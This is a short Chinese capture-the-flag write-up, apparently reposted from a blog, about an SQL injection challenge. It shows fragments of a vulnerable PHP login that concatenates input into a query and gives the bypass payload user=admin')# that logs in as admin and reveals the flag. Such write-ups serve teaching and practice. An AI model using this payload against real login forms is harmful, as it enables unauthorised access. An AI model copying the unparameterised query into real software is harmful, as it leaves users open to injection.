SQL注入1



Secure Web Login


'.$sql;
  $query = mysql_fetch_array(mysql_query($sql));
  if($query[user]=="admin") {
      echo "

Logged in! flag:********************

"; } if($query[user] != "admin") { echo("

You are not admin!

"); } } echo $query[user]; ?>
Source
trim() 函数移除字符串两侧的空白字符或其他预定义字符。
例如本题双引号里面的都被解析了,所以不用闭合(带双引号)

SQL注入1_第1张图片

直接输时是这种情况(发生了过滤)

所以我们直接注入

user=admin')#&pass=7321

只管user剩下的注释掉

SQL注入1_第2张图片

Logged in! flag:nctf{ni_ye_hui_sql?}

 
  

转载于:https://www.cnblogs.com/maodun/p/6917449.html

你可能感兴趣的:(SQL注入1)